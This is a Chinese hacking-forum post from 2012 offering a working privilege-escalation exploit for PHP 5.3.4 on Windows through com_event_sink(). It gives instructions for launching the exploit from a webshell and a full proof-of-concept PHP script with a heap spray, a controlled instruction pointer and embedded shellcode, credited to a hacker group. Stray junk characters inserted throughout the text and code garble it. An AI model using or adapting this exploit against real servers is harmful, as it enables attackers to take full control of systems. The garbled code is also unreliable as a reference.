找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2313|回复: 0
打印 上一主题 下一主题

PHP 5.3.4(WIN) COM_SINK权限提升漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:08:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中" I7 @7 u6 I# s; E

7 c6 Z' [2 E5 f( C  ]$ N测试方法如下:cmd /c x:\php\php.exe x:\test.php
+ P3 W& V: Y; n9 v7 o# @: ^8 D, z9 p6 |3 C
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
; n- Q1 \; p- X0 x5 E这里是两个测试的截图:) u5 n, P9 U7 Z$ a( U1 k5 k
3 h" R3 W8 ^! j9 q( j$ a
' w! u8 D2 w/ Z( c+ j- Q/ {

. e+ c, ?1 d+ v( a9 S9 ^8 x9 o5 C2 S+ x- M: _+ x" t+ H
: c4 q! f: \8 O) p/ e- }
成功利用此漏洞的攻击者将获得系统的最高权限
: X" D+ C& N+ u; [4 X+ u* A  z" x3 M! b+ ~
) [1 S# n/ G4 Y# u. m# G; b2 f

) |( J9 {9 k* Q( O% w9 t: x, f5 x2 K* ]

7 O) l4 ]2 W$ O* d# X关于漏洞分析稍后附上。一下是PoC代码:
, }" V6 n! T/ ?/ N, z/ Q, X# R: Q& c3 [% [$ s4 f
<?php
. C# Y5 Q5 G7 B$ v//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞6 F. C- d' K; c/ Q, h4 @( E
//$eip ="\x44\x43\x42\x41";2 h: N: _* X1 x  v! G2 |
$eip= "\x4b\xe8\x57\x78";
' }  F$ K+ ]* c1 p, A$eax ="\x80\x01\x8d\x04";" v. J+ U6 x2 {- I( ~
$deodrant="";1 ]) m& S& c* E/ j, l
$axespray = str_repeat($eip.$eax,0x80);" ~4 i; y; x! D% X# c
//048d0190
( }# \# A3 S! H+ R( K/ V; @echo strlen($axespray);% W# D; w- u" X- `0 P8 i
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
( m( h  r3 ?( D9 {' a, `3 E9 Pecho "Silic Group Hacker Army - BlackBap.Org";2 e; K5 Z) D" S6 L8 e
//19200 ==4B32 4b00
2 D1 T# R/ f9 D! G" Efor($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}+ U; q2 a  }! d# k
$terminate = "T";
& f) O4 \  J! ]$u[] =$deodrant;
- W( t1 _9 G7 S* [8 k$r[] =$deodrant.$terminate;& H/ _  J- u3 m' b4 j) A, E
$a[] =$deodrant.$terminate;, |" R# u" q) v+ a% D! M$ p6 p
$s[] =$deodrant.$terminate;
# X7 }* Q& R( z8 o( R/ Y//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
" O  ]; Y* ]* n* g0 D6 E0 i$vVar = new VARIANT(0x048d0000+180);
+ s# Y5 W5 I3 [* Q9 e//弹窗代码(Shellcode)
$ e! P: ]6 k5 A- I1 T" B: u0 u+ S$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";5 N% `5 p9 A' F% {0 X
$var2 = new VARIANT(0x41414242);
* P! h4 B+ V2 r# e2 rcom_event_sink($vVar,$var2,$buffer);
  G  {1 \1 h7 {. J?># x/ I9 L- a: b2 [7 \* R+ z, C

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表